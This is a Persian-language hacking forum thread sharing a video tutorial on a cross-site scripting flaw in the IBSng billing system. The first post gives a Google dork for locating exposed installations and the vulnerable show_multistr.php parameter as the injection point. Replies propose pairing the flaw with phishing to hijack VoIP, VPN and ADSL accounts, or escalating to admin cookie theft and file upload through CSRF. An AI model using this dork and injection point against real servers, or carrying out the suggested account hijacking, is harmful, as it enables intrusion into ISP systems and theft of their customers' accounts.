SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

IBSng Cross Site Scripting

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • IBSng Cross Site Scripting

    با سلام.
    در این درس آموزشی ، به IBSng Cross Site Scripting از نوع Web Applications Bugs پرداخته شده است.

    [align=center][/align]

    دورک و اکسپلویت استفاده شده:

    [php]google dork:
    inurl:"/IBSng/"

    exploit:
    IBSng/util/show_multistr.php?str=[XSS][/php]

    لینک دانلود :
    [php]http://5.9.0.163/~a3is/iranhack/movie/IBSng%20Cross%20Site%20Scripting.zip[/php]

    رمز عبور :
    [php]iranhack.com[/php]

    آرزوی موفق براتون دارم. ارادتمند 3is@
    [align=center][/align]
    [align=center]

    ما زنـ-ـ-ـده به آنیـــم که آرام نگیریم
    موجیم که آسودگی ما عدم ماست

    [/align]

  • #2
    RE: IBSng Cross Site Scripting

    دوستان از این باگ استفاده های زیادی میشه کرد که در پی کامل کردن فیلم دوستمون میتونم بگم که انواع بحث های هک اکانت های voip یا vpn یا adsl رو با ترکیب فیشینگ رو با این باگ انجام بدین که اگر تارگت مناسب گیر بیارم براتون فیلم میگیرم .
    [align=center]iRaNHaCk SeCuRitY TeAm

    [/align]

    نظر


    • #3
      RE: IBSng Cross Site Scripting

      سلام و خسته نباشید.
      از شما به خاطر زحماتتون تشکر میکنم.
      اما این فیلم بیشتر شبیه به دمویی از یک باگ XSS بود نه بیشتر و زیاد محتوا نداشت.
      من از شما که میبینم علاقه مندین تقاضا میکنم فیلم هایی با محتوای بیشتر بزارین.
      مثلا این فیلم توش اصلا نفوذی انجام نشد. ! به جز بارگذاری عکس
      شما میتونید یک سناریو کامل انجام بدین تا مثلا کوکی ادمین ! یا حتی با بررسی بیشتر بتونید مستقیم فایل آپلود کنید.
      به کمک csrf اگه توکن رو چک نمیکنه.
      ممنون

      نظر


      • #4
        RE: IBSng Cross Site Scripting

        سلام لطفآ اگه هنوز کارایی داره فیلم آموزشی قرار بدید .

        نظر

        صبر کنید ..
        X